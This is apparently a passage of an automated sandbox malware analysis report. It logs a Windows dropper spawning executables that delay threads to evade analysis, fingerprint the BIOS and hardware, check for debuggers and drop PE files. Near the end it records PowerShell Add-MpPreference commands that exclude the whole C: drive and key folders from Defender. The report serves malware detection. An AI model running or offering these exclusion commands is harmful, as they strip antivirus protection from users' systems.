                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 587577
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 587297
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 586922
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 586578
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 586234
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 585906
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 585656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 585487
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 585359
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 585247
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 585047
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 584904
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 584750
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 584578
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 584464
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 584358
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 584248
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 584138
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 583906
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 583774
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1295
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1170
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1236
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1233
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1324
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1197
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1279
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1269
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1198
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1734
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1127
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1829
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1404
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1249
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1215
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1256
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1437
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1296
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWindow / User API: threadDelayed 9636
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZDjBezmV.log
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\DBQFDgRN.log
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\xIogbBMY.log
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\DjKnpLXK.log
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\FpiFczmJ.log
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\vBEPsorb.log
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\BkJolhdT.log
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\mUJprpRq.log
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\YBKLwVHY.log
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\amqbDjSR.log
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\pIbqPImn.log
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\tSxpUEMf.log
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\REWLTGNk.log
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\PVPluWhn.log
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23683
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe TID: 7980Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604Thread sleep count: 1295 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -13835058055282155s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8548Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep count: 1170 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8752Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6384Thread sleep count: 1236 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8812Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1620Thread sleep count: 1233 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8832Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8528Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 1324 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8572Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep count: 1197 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340Thread sleep count: 1279 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8620Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336Thread sleep count: 1269 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8480Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 1198 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8764Thread sleep time: -13835058055282155s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072Thread sleep count: 1734 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 1127 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8256Thread sleep count: 1829 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8592Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8296Thread sleep count: 1404 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8772Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8196Thread sleep count: 1249 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8280Thread sleep count: 1215 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8628Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8292Thread sleep count: 1256 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8788Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8688Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep count: 1437 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8676Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344Thread sleep count: 1296 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8488Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 8588Thread sleep time: -30000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -600000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -599872s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -599593s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 5812Thread sleep time: -32400000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -598828s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -598437s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -597781s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -597203s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596843s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596609s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596265s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596073s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -595850s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -595531s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -595156s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594922s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594672s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594312s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -593656s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -593156s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -592859s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -592437s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -592000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -591484s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -591160s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -590937s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -590562s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -590265s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -589828s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -589000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -588656s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 5812Thread sleep time: -300000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -588343s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -587859s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -587577s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -587297s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -586922s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -586578s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -586234s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585906s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585656s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585487s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585359s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585247s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585047s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584904s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584750s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584578s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584464s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584358s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584248s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584138s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -583906s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -583774s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 3888Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027A69B
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0028C220
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028E6A3 VirtualQuery,GetSystemInfo,0_2_0028E6A3
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 30000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 3600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Thread delayed: delay time: 300000
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe File opened: C:\Users\user
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe File opened: C:\Users\user\Documents\desktop.ini
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe File opened: C:\Users\user\AppData
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe File opened: C:\Users\user\AppData\Local\Temp
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe File opened: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe File opened: C:\Users\user\AppData\Local
                        Source: ComrefNetsvc.exe, 00000008.00000002.2149675445.000000001AF9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: w32tm.exe, 00000030.00000002.2149119622.000002FA756F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe API call chain: ExitProcess graph end node graph_0-23874
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0028F838
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_00297DEE mov eax, dword ptr fs:[00000030h] 0_2_00297DEE
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0029C030 GetProcessHeap,0_2_0029C030
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0028F838
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028F9D5 SetUnhandledExceptionFilter,0_2_0028F9D5
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0028FBCA
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_00298EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00298EBD
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'
